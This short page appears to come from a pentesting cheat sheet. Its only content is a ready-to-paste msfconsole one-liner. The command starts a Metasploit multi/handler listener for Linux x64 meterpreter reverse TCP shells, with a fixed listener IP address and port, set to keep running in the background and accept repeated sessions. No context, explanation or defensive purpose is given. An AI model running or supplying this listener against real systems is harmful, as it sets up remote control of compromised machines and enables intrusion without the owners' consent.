# Metasploit

## Msfconsole Listener 1 Liner

```python
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 191.96.31.13; set LPORT 4444; set EXITONSESSION FALSE; exploit -j"
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FsOn2X7qioSlTjmPwsU1L%2Fimage.png?alt=media&#x26;token=89e91fa8-057b-4e40-8364-23996b7d2266" alt=""><figcaption></figcaption></figure>
